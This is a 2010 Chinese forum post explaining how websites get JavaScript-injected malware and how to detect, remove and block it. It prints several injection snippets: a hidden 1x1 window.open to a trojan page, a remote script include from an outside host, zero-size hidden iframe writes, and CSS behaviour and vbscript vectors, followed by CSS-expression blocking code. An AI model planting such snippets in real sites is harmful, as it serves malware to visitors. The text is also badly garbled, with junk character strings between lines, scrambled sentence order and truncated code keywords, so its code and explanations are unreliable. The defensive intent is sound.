搜索
查看: 12058|回复: 0

网站被JS挂马解决方法

[复制链接]
发表于 2010-11-10 08:17:49 | 显示全部楼层 |阅读模式

网站被JS挂马解决方法

7 G) E* j- j$ f6 z# S) P

为什么网页挂马还是屡见不鲜?这恐怕就要说一说 CSS 挂马了下面我详细讨论 虽然能够巧妙地利用 CSS 代码防范

7 i) {& H$ \& N( p4 ^% D) w

IFRAME 和 JS 脚本挂马。

5 b4 Z) v, i9 z/ z- F; C6 I# g

检测网页木马也是很重要的一项工作,目前流行的网站被黑,相应的 asp,

8 {) t) g+ x g1 ^0 B/ L* C) b

网站优化设计当中。htm,j 等文件中,插入以 js 调用方式的本文主要介绍网页挂马的种类、如何检测网页是否被挂马、

" d8 x1 R1 P" K" i! b

如何清除网页木马。如何防止网页被挂马。
1: 网页挂马的种类 .

" t& |+ X) H5 J* } N

相应的 asp, 目前流行的网站被黑。htm,j 等文件中,插入以 js 调用方式的

* ^6 L+ |! t7 Z6 N8 P7 J

卢松松以前做过的极品源码下载站 ’ 就遇到过 JS 挂马

8 ]+ n% F9 Y x

利用动网程序漏洞 ( 上传附件漏洞 ) 拥有网站管理员权限。删了论坛几千条数据 , 校园闹翻天论坛 ’ 就遇到用户提权

3 r1 A6 E$ n+ G% K& u

。一千多位会员的 ID

. ~# c" ^0 M' b

2: 如何检测网页是否被挂马。

' S" p8 E \7 P, y

六款免费网页平安检测工具横向测评 ( 华军软件园 )
1 专业检测工具。>

# E! \0 _2 G& }- M6 B

或者可以利用 Googl 搜索你网站、博客进行检测。如果有网站有木马则 googl 会在搜索列表的下方提示该网站有不安全

1 |" J9 I9 k- z$ w( j8 o

因素。
2 googl 检测。>

8 }- F- a# o% Q* L( N

常用的杀毒软件也可以检测出来。
3 杀毒软件检测。>

5 D# C2 S5 O: e0 t5 o6 k% Z$ m0 v9 U

打开你网站、博客,
4 人工检测。点击右键查看源文件,根据网页挂马的种类也可以查看是否中了木马。

( W- v* x2 [; _

5 使用 McAfee SiteAdvisor 平安浏览网页的插件。

1 a0 ]0 X; Y9 w( H3 G& e

. }( B9 P: E$ O1 e5 }! v

3: 如何清除网页木马。

) d8 O5 N( _7 R! K; a$ |

就看那些文件是最近修改过的主要检查这些新文件, 一旦中了网页木马。从 FTP 中可以检查文件最近修改时间。然后进

. N) D+ ~6 L! J# ]! k2 W/ s9 M

入源文件把相关的网页挂马种类的可疑代码删除。

+ u5 \6 X- q/ c6 _+ W

建议删除所有文件 ( 数据库、图片、文档、顺序模板主题等文件夹可以保留 ) 如果你对你所使用的网站、博客程序不熟

" e! V" ~% O) K

悉。>

9 B$ R' B! Q* W7 I4 @! r3 \

请从预防开始吧。
4: 如何防止网页被挂马。如果你网站还没有被挂马。>

6 c0 K# K- h$ _* d; j; N

并只允许信任的人使用上传程序。
1 对网友开放上传附件功能的网站一定要进行身份认证。>

0 K- D/ y( a8 s

2 保证你所使用的顺序及时的更新。

v- {7 w5 r( ^ Q$ A* B V- c

3 不要在前台网页上加注后台管理程序登陆页面的链接。

% y6 n, T9 i; C+ L" U8 K

但不要把备份数据库放在顺序默认的备份目录下。
4 要时常备份数据库等重要文件。>

; M5 P0 u2 u/ y6 l

不能过于简单。
5 管理员的用户名和密码要有一定复杂性。>

* a+ y Z% n' N+ W

二项功能组合,
6 IIS 中禁止写入和目录禁止执行的功能。可以有效的防止 ASP 木马。

: L4 f2 ^: H7 u! E4 \( A. H6 P

设置执行权限选项中,
7 可以在服务器、虚拟主机控制面板。直接将有上传权限的目录,取消 ASP 运行权限。

( j; R$ H" Q7 N8 X/ Y

8 创建一个 robots.txt 上传到网站根目录。 Robot 能够有效的防范利用搜索引擎窃取信息的骇客

: v$ q& z4 }( k3 T- i& ]) R& m

& J) Q4 Y( l9 H, k n2 g T" O

IFRAME 挂马比较早, < IFRAME 挂马比较早。相应的预防措施也比较多,其中用 CSS 配合 JS 脚本进行预防是主流方式

) |6 M9 P- E/ t

。可这种预防方式也存在平安隐患, JS 脚本也可以被用来挂马,令人防不胜防。下面要介绍反击 JS 挂马的方法。

" a/ `0 Y! _5 X9 e% i. W

JS 挂马溯源

1 ~3 h: P! T% I

有经验的平安工程师也开始研究相应的对策,当 IFRAME 逐渐被黑客滥用的时候。一段时间内各种阻止 IFRAME 挂马的方

. M+ O- W) `- z1 p8 N

法不时涌现,其中通用性较高的就是利用 CSS 配合 JS 脚本防御 IFRAME 挂马。

0 I0 \0 G% O; s& E( F2 o& C8 V

很多网站都会让网页调用 JS 脚本来实现广告等诸多特效,而黑客也发现。如果将木马挂在 JS 脚本中,所有调用该 JS

5 U0 e# `$ r1 x* W" _* q% o

脚本的网页都等同于被挂上了木马,对于需要肉鸡群的黑客而言是一劳永逸,因此 JS 脚本挂马逐渐开始被黑客应用。

- k u& D9 t& ^; m! ?

一种面向对象的脚本语言,小百科: JS 脚本是 JavaScript 脚本语言的简称。目前广泛用于动态网页的编程。需要提示

6 Z4 I# m2 f7 u

大家的 JavaScript 和 Java 除了语法上有一些相似之处,以及都能够当作网页的编程语言以外,两者是完全不相干的而

9 H+ r* R) y+ O: M2 z3 T# t& t

JavaScript 与 Jscript 也不同, Jscript 微软为了迎战 JavaScript 推出的脚本语言。

; B. c7 ]4 y- e6 s/ f9 R/ m

但是 JavaScript 一门具有丰富特性的语言,虽然 JavaScript 作为给非程序人员的脚本语言向大众推广。有着和其他编

# V: R$ O1 c- U6 d. L: Z

程语言一样的复杂性。实际上,必需对 JS 有扎实的理解才干用它来编写比较复杂的顺序,作为一名平安工程师,掌握 JS

+ q( f; [- A6 X0 V$ W1 q3 T

脚本在工作中会有很大的协助。

3 [) o& N2 J. B2 C+ ?% \1 h

挂马原理一点通

1 \4 @9 D5 D5 O& h0 E Z

可以说优点多得数不过来, JS 脚本挂马对于黑客而言。首先 JS 脚本在挂马时可以直接将 JS 代码写在网页中,也可以

, T. b' r% z6 I2 `$ u: ~

通过注入网页,让网站远程调取异地 JS 脚本。此外, JS 挂马插入 Web 页面的方法有几十种,绝对够菜鸟们眼花缭乱,

! c% s# ~" h% l' W

无从区分木马在何处。

: Z$ f$ H, W3 o4 R

如同一个穿着鲜红颜色外衣的劫匪, IFRAME 挂马相对于安全工程师而言。招摇而扎眼,很容易被发现。但是利用 JS 挂

# ?: `( u. I. v& e+ r0 O

马就意味着这个劫匪拥有了一张可以随时变换的面孔,而且它还能够随时更换衣服。这样的劫匪在平安工程师搜查时,很

( S6 z2 t2 ]- i- h% y. `( D

容易蒙混过关,导致木马久杀不绝。

5 M2 S/ z0 R% F# }) g1 W

JS 挂马攻防实录

9 g- x; |: I4 a* Y7 N4 L% g: t

一种是直接将 JavaScript 脚本代码写在网页中,攻现在最多见的 JS 挂马方法有两种。当访问者在浏览网页时,恶意的

1 ]. |. r9 x" M7 @" i0 {

挂马脚本就会通过用户的浏览器悄悄地打开网马窗口,隐藏地运行。

0 r* L' W$ h& `6 v q# m6 f& H

这种方法使用的关键代码如下:

+ ]' l! d1 t6 Y( |; i/ x

"",  window.open "http://www.v404.cn/ 木马

. N/ c+ N8 P5 Y% c0 |& v

.html"."toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1" ;

4 z l; ]4 C, e, s+ i3 ^

1 L, a% X- Z' L- ]" P! _! g" t

很容易被安全工程师发现,这种代码往往很长。而且没有经验的黑客也喜欢将 “ width 和 “ height= 参数设为 “ 0

; p V7 a5 S2 U" c! J1 e

但是设置为 0 后,可能会出现恶意代码不运行的情况。

, q: X7 t1 h- f

并上传到自己指定的网址。这时黑客只需要在受害者的网站中写入: 另外一种 JS 挂马方式是黑客先将挂马脚本代码 “

# C" d7 [. e, j8 ?/ N

document.writ ' < Iframe src=" 网页木马地址 " ></ifram > ' 写入 Window 中的写字板另存为后缀为 .j 脚本文件

# A4 g: A# K2 }6 r, n

。

$ z, J* {& I, s: b U

<script src="http://www.v404.cn/ 木马脚本 .js"></script>

: v7 U" p! s8 R* @6 ?# b1 M

& J3 P5 d7 Z* d! M& v* a, A

或者

; k2 E1 W* Y5 E5 @0 C; W) _& _

document.writ "<div style='display:none'>"

8 B" a5 Q' r+ R3 @

document.writ "<ifram src=" 网页木马地址 " width="0" height="0" scrolling="no" frameborder="0"></iframe>"

' I# Z" K+ ?* J9 D4 d, b3 i

document.writ "</div>"
 

# v$ w" M$ M2 y& N4 ^4 {# Y

m/ S/ s/ v- a! C5 ]

就成功地将木马挂到对方的网页中了

4 J$ O* l, F4 H' u- r

例如黑客有可能会将脚本写为: 小提示:黑客还可以根据情况随机变换拔出的 JS 挂马方法。

" k0 N- G" M' {$ R7 `; r- b$ t# D

<div style="behaviour: url http://www.v404.cn/ 木马脚本 .j ;">

4 i8 U0 A0 D% P' Y5 R' O: {7 J

或者:

- L! c. r! }! Y/ |# E

<ifram src="vbscript:[ 挂马脚本 ]">

$ c8 _- l4 D3 S: O' e, x

3 Q6 ?& V# V s" R


等等 …

2 [) f9 n3 K5 m6 t

不方便,防第一种 JS 挂马方式。用得非常少,而第二种 JS 挂马方式才是当前主流的所以我主要针对它进行防御。方法

3 c y* W7 K0 h8 a7 D) Y

就是阻止 Src 请求的异地外域的 JS 脚本,代码如下:

6 P8 n5 L; F1 p' x

iframe{mdy1:express this.src='about:blank', <  iframe{mdy1:express this.src='about:blank'.this.outerHTML=''

# |1 P$ t2 C0 N8 m! v+ y

;}

, ~8 p, \) I0 _7 W: w n& k

script{mzm2:express this.src.toLowerCas .indexOf 'http' ==0 ?document.writ ' 木马被成功隔离 !' :'' ;}
 

* l! \+ |. g0 |) y

. L9 h& b y8 q/ L# |

不过这种方法的缺点就是网站的访问者将不能看到被挂了 JS 木马的相关网页。

4 Q5 `* i' z1 G4 P1 p% ?: [

这段代码会让异地外域的 JS 文件在使用 document.writ 时,所以我为安全工程师提供了一段可以中止 JS 脚本运行的

2 U V$ I4 W. A* {; P ]

CSS 代码。被 document.clos 强制关闭。这个时侯 JS 挂马的内容往往还没有来得及写完,只有局部被强制输出了

3 e! @9 r9 `/ a/ S; \1 | C- s

Writer 后面的内容再不会被写入访问者的电脑中,从而起到防范 JS 脚本挂马的作用。

1 e: ?# W2 D1 W3 L" ~7 q

<title> 让 JS 挂马中止的 CSS 代码 </title>

4 {% Q* a2 }) V

<styl type="text/css" id="shudoo">

: o% ]/ _) p9 D: J$ B$ d

/*<![CDATA[*/

) l, c0 m/ ]& o: k

this.outerHTML='' ;iframe{mdy1:express this.src='about:blank'.}

+ P1 {+ F1 p# i: c) v+ _$ _

script{mzm2:express this.src.indexOf 'http' ==0 ?document.clos :'' ;}

5 v& E+ k- u8 S# m0 o

/*]]>*/

( D& s7 S0 _$ a! p+ Q1 `6 ~1 Q

</style>

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册帐号

本版积分规则

热议作品
精华帖子排行
精彩推荐

虾皮社区,成立十年了!

站长自己也搞不懂想做个什么,反正就是一直在努力的做!

Copyright © 2007-2019 xp6.org Powered by Discuz

QQ|Archiver|手机版|小黑屋|虾皮社区 鲁公网安备 37021102000261号 |网站地图
返回顶部 返回列表